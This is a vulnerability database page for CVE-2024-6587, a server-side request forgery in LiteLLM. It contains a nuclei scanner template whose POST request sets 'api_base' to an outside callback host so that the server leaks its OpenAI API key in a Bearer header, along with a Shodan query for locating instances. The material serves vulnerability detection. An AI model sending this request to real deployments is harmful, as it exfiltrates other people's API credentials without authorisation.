Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

LiteLLM - Server-Side Request Forgery

🗓️ 02 Jun 2026 10:14:34Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 63 Views

LiteLLM Server-Side Request Forgery Exposes OpenAI API Key

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2024-6587
13 Sep 202418:48
circl
CNNVD		LiteLLM 代码问题漏洞
13 Sep 202400:00
cnnvd
CVE		CVE-2024-6587
13 Sep 202415:59
cve
Cvelist		CVE-2024-6587 SSRF in berriai/litellm
13 Sep 202415:59
cvelist
Github Security Blog		LiteLLM Server-Side Request Forgery (SSRF) vulnerability
13 Sep 202418:31
github
NVD		CVE-2024-6587
13 Sep 202416:15
nvd
OSV		GHSA-G26J-5385-HHW3 LiteLLM Server-Side Request Forgery (SSRF) vulnerability
13 Sep 202418:31
osv
RedhatCVE		CVE-2024-6587
5 Feb 202502:55
redhatcve
The Hacker News		Over 400 IPs Exploiting Multiple SSRF Vulnerabilities in Coordinated Cyber Attack
12 Mar 202511:56
thn
Veracode		Server-Side Request Forgery (SSRF)
16 Sep 202409:20
veracode
Rows per page
id: CVE-2024-6587

info:
  name: LiteLLM - Server-Side Request Forgery
  author: pdresearch,iamnoooob,rootxharsh,lambdasawa
  severity: high
  description: |
    LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.
  impact: |
    Attackers can exploit SSRF to send requests to arbitrary URLs with OpenAI API keys in the Authorization header, potentially exposing API credentials.
  remediation: |
    Update LiteLLM to the latest version that addresses the SSRF vulnerability in the chat/completions endpoint.
  reference:
    - https://huntr.com/bounties/4001e1a2-7b7a-4776-a3ae-e6692ec3d997
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6587
  classification:
    epss-score: 0.88631
    epss-percentile: 0.99524
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:439373620
  tags: cve,cve2024,ssrf,openai,litellm,vkev,vuln,ai

http:
  - raw:
      - |
        POST /chat/completions HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "model": "command-nightly",
          "messages": [
            {
              "content": "Hello, how are you?",
              "role": "user"
            }
          ],
          "api_base": "https://{{interactsh-url}}"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "Bearer"
# digest: 4a0a00473045022100a29c2657cc28f06f21c3a21f8488f022fb08888bc5f85aa4ccd324d3e7023af802200e3b516423ed6e04642f27ff562e3f9851fc78660b40b3df1dc8e1b6633c3950:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.17.5
CVSS 37.5
EPSS0.88631
SSVC
litellmserver-side request forgerycve2024vulnerabilityopenai
63